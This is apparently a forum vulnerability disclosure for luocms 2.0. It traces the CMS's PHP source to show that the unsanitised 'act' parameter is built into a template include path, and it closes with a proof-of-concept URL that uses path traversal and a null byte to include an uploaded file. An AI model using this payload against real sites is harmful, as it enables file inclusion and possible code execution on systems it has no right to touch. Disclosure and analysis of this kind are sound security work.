/*******************************************************/ /* luocms 2.0 Local File Inclusion Vulnerability /* ======================== /* E-Mail : 681796@qq.com /*======================== /*******************************************************/ /* Welcome to https://www.90sec.com */ /*******************************************************/ //首先看看首页 <?PHP require_once "inc/const.php"; $id = getvar("id"); //查看函数 getvar $fid = getvar("fid"); $cid = getvar("cid"); $act = getvar("act"); $p = getvar("p"); $p = !empty($p) ? $p : 1; $p_l = new cls_tpl(); $p_l->tpl_main($act,$id,$cid,$sitepath,$p); ?> //跟入tpl_main 函数 function tpl_main($act,$id,$cid,$sitepath,$p){ //$stime=microtime(true); //获取程序开始执行的时间 $tpl_addr = $this->get_tpl($act); $temp = $this->load_tpl($tpl_addr); $temp = $this->get_include_file($temp);//包含产生 $temp = $this->get_sys_tag($temp,$id,$cid); $temp = $this->get_list_tag($temp,$id,$cid,$p); $temp = $this->get_url_path($temp); $temp = $this->get_sort_tag($temp,$id,$cid); $temp = $this->get_title_tag($temp,$id); $temp = $this->get_sitepath($temp,$act,$id,$cid); if ($id != ""){ $temp = $this->get_content_content($temp,$id); $temp = $this->get_prv_next($temp,$id); } echo $temp; //$etime=microtime(true);//获取程序执行结束的时间 //$total=$etime-$stime; //计算差值 //echo "<br />$total times"; } //跟入get_tpl函数 function get_tpl($act){ if ($act != "") { $temp = $GLOBALS[templatedir].$act.$GLOBALS[rewriteext]; }else{ $temp = $GLOBALS[templatedir].$GLOBALS[indextemplate]; } return $temp; } //$GLOBALS[templatedir].$act.$GLOBALS[rewriteext]; 看看赋值 $installdir = ""; $templatedir = 'template/'; $databasePrefix = "luo_"; $indexname = "LUOCMS首页"; $indextemplate = 'index.html'; $httpurl = "https://127.0.0.1/lUOCMS_UTF8_V2.0.101201/upload/"; $defaultext = 'html'; $sitepathsplit = ' > '; $titlepathsplit = ' - '; $rewriteext = '.html'; $author = "Admin"; $source = "本站"; $site_beian = "123456"; $manager_email = "admin@luocms.com"; $sysversion = "V2.0.101108_UTF8"; $issetup = "0"; //ok template/$act.html $act 可控 产生包含

poc: https://www.luocms.com/index.php?act=../upload/file/3.txt%00